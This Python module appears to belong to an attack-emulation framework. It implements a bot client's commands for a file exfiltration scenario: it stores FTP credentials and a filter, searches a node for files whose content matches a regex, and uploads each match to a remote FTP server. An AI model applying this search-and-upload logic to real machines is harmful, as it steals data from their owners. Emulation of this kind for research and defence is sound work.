
"""

This file contains the Client Command Meta Description for the file
exfiltration scenario.

"""

import re

from core.real.node import PhysicalNode
from core.nodes.client import ClientCMD as CCMD
from scenario.file_exfiltration.config import Client as ClientDescription

# Passed as the first argument to node.get_file_list() in
# ClientCMD.search_files. Presumably the maximum number of candidate files
# returned per search -- confirm against the node implementation.
MAX_NUM = 100

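class ClientCMD(CCMD):

    """Client-side command set for the file exfiltration scenario.

    The class stores two pieces of state received through its command
    handlers: `ftp_info` (upload destination and credentials) and
    `file_filter` (suffix, directory and content pattern). On
    `search_and_upload` it asks the node for a file list, loads each file
    to test it against the pattern, and uploads every match through
    `node.ftp_upload`. All file and network access is delegated to
    `self.node`.

    NOTE(review): `self.logger` and `self.node` are not set in this class;
    they are presumably provided by the CCMD base class and by `install()`
    -- confirm against core.nodes.client.
    """

    def __init__(self, desc=None):
        """Initialize the command set.

        `desc` is the client description handed to the base class; a
        default ClientDescription is created when it is omitted.
        """
        # Identity test: `== None` would invoke a custom __eq__ on `desc`.
        if desc is None:
            desc = ClientDescription()
        CCMD.__init__(self, desc)
        self.ftp_info = None
        self.file_filter = None

    def set_ftp_info(self, sock, data):
        """Store the FTP destination that matching files are uploaded to.

        `data` must expose `hostname`, `user` and `password`, which
        upload_file reads. `sock` is not used here; it is presumably part
        of the handler signature expected by the dispatcher -- confirm.
        """
        # `data` carries the FTP password, so only the non-secret fields are
        # logged; debug logs tend to outlive the credentials they describe.
        self.logger.debug('set_ftp_info, receive data, hostname=%s user=%s',
                          getattr(data, 'hostname', None),
                          getattr(data, 'user', None))
        self.ftp_info = data

    def set_file_filter(self, sock, data):
        """Store the filter used by search_files.

        `data` must expose `suffix`, `directory` and `pattern`. `sock` is
        not used here.
        """
        # Logger-style arguments instead of '%s' % (data): `(data)` is not a
        # tuple, so a tuple-valued `data` would raise TypeError on formatting.
        self.logger.debug('set_file_filter, receive data, %s', data)
        self.file_filter = data

    def search_and_upload(self, sock, data):
        """Search for matching files and upload each one to the FTP server.

        Neither `sock` nor `data` is used. Returns None. upload_file reads
        attributes of `self.ftp_info`, so set_ftp_info must have run before
        any match is found, otherwise the upload fails with AttributeError.
        """
        interesting_files = self.search_files()
        if not interesting_files:
            self.logger.info('no interesting files have been found')
            return
        for i_file in interesting_files:
            self.upload_file(i_file)

    def search_files(self):
        """Return the files whose content matches the stored filter pattern.

        Returns an empty list when no filter has been set. Candidates come
        from node.get_file_list(MAX_NUM, suffix, directory); each one is
        then loaded and checked by check_file.
        """
        if self.file_filter is None:
            return []

        suffix = self.file_filter.suffix
        directory = self.file_filter.directory
        pattern = self.file_filter.pattern

        f_list = self.node.get_file_list(MAX_NUM, suffix, directory)
        # Routed through the logger like the other handlers, instead of the
        # Python 2 print statements that wrote file names to stdout.
        self.logger.debug('file_list %s', f_list)
        interesting_files = [f for f in f_list if self.check_file(f, pattern)]
        self.logger.debug('interesting_files %s', interesting_files)
        return interesting_files

    def check_file(self, c_file, pattern):
        """Return True when the content of `c_file` matches `pattern`.

        The content is whatever node.load_file returns; `pattern` is handed
        to re.search unchanged, so it is interpreted as a regular expression.
        """
        f_content = self.node.load_file(c_file)
        return bool(re.search(pattern, f_content))

    def upload_file(self, u_file):
        """Upload one file through node.ftp_upload using the stored ftp_info.

        NOTE(review): if node.ftp_upload speaks plain FTP, the user name and
        password cross the network unencrypted -- confirm against the node
        implementation.
        """
        self.node.ftp_upload(u_file, self.ftp_info.hostname,
                             self.ftp_info.user, self.ftp_info.password)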

if __name__ == "__main__":
    # Manual wiring check: build the command set with an explicit
    # description, then install it on a physical node. The command set is
    # created before the node, as in the original sequence.
    client_cmd = ClientCMD(ClientDescription())
    physical_node = PhysicalNode()
    client_cmd.install(physical_node)
    # Starting the node and running a direct file search were left disabled
    # by the author, so this entry point only installs the command set.